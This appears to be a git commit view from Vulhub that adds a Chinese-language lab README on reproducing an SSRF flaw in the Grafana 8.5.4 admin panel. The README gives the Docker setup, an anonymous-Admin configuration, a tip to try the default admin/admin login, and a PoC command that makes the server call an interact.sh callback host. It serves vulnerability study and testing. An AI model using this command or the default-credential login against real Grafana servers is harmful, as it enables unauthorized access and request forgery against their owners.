first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

View File

@@ -0,0 +1,39 @@
# Grafana管理后台SSRF
Grafana是一个开源的度量分析与可视化套件。在其管理后台中存在一个功能攻击者可以用于向任意地址发送HTTP请求且支持自定义HTTP Header。
参考链接:
- <https://github.com/RandomRobbieBF/grafana-ssrf>
## 漏洞环境
执行如下命令启动一个Grafana 8.5.4
```
docker compose up -d
```
环境启动后,访问`http://your-ip:3000`即可查看到管理后台。这个管理后台是不需要登录的因为Vulhub环境设置了匿名用户的权限
```ini
[auth.anonymous]
enabled = true
org_role = Admin
```
在真实场景中,如果你没有权限访问管理界面,可以尝试使用默认账号密码`admin``admin`,只能能够成功登录后台的用户才能利用这个漏洞。
## 漏洞复现
使用[这个POC](https://github.com/RandomRobbieBF/grafana-ssrf)来复现SSRF漏洞
```
python grafana-ssrf.py -H http://your-ip:3000 -u http://example.interact.sh/attack
```
![](1.png)
可见我们的反连平台已成功收到了HTTP请求
![](2.png)